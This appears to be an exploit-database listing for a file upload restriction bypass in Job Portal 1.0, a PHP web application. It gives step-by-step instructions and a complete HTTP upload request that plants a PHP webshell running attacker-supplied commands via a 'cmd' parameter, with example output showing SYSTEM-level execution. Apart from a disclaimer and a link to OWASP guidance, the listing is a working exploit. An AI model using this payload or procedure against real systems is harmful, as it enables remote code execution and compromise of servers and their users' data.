Job portal 1.0 file upload restriction bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-05-13 | Type : webapps | Platform : php
This exploit / vulnerability Job portal 1.0 file upload restriction bypass is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

<!--
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link:
https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps


1. Description

File Upload Restriction Bypass vulnerabilities were found in Job Portal
1.0. This allows for an authenticated user to potentially obtain RCE via
webshell.


2. Proof of Concept

1. Go the user profile >> (/jobportal/applicant/)
2.- Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php
Not neccesary change content type to 'image/png'

Example exploitation request:

====================================================================================================

POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png

?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"


-----------------------------57052814523281--

====================================================================================================

6. Send the request and visit your new webshell
Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
nt authority\system

3. Solution:

Patch:
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

-->